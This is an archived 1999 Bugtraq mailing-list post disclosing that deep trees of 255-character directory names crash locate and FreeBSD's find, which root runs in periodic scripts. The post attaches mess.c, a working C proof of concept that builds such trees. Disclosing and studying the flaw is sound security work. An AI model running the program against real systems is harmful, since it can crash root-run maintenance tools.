[10423] in bugtraq
Re: Buffer overflow in ftpd and locate bug
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Mon May 3 19:30:16 1999
Mime-Version: 1.0
Content-Type: Multipart/Mixed; boundary=Message-Boundary-25450
Message-Id: <19990502183800.1113.qmail@venglin.gadaczka.org>
Date: Sun, 2 May 1999 20:37:35 CEST
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.990430105441.23881A-100000@gw.al.lg.ua>
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
> I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1
> It segfaults if we have huge directory at incoming ftp which created
> by exploits for ftpd realpath hole. My ftpd is patched. Those exploits
> ,i think, should not afraid me, but if updatedb puts to locate database
> that directory then locate segfaults. ( getline.c 104 row by gdb )
> I guess it can be used for running arbitrary commands if root runs locate.
I've noticed a similar problem with /usr/bin/find on FreeBSD. By
creating _very_ long and deep directory structure it's possible
to segfault /usr/bin/find (it's also used in /etc/periodic scripts,
which runs on root).
Example:
I'm creating a directory structure with 300 subdirectories, each
255 chars length (source in attachment, also it's possible to do it
via ftpd, because it calls mkdir() and chdir()).
lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)
Gdb shows, that functions puts() was overflowed, when it tried to
print a very long path.
Also other system tools (rm, ls) has big problems with such
directory structures.
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-disposition: inline
Content-description: Attachment information.
The following section of this message contains a file attachment
prepared for transmission using the Internet MIME message format.
If you are using Pegasus Mail, or any another MIME-compliant system,
you should be able to save it or view it from within your mailer.
If you cannot, please ask your system administrator for assistance.
---- File information -----------
File: mess.c
Date: 2 May 1999, 19:01
Size: 748 bytes.
Type: Text
--Message-Boundary-25450
Content-type: Application/Octet-stream; name=mess.c; type=Text
Content-disposition: attachment; filename="mess.c"
#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#define DUMP 0x41
main(int argc, char *argv[]) {
char buf[255];
int i = 0;
if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }
if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }
memset(buf, DUMP, 255);
for(i=0;i<(atoi(argv[2]))-1;i++) {
if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
}
exit(0);
}
--Message-Boundary-25450--
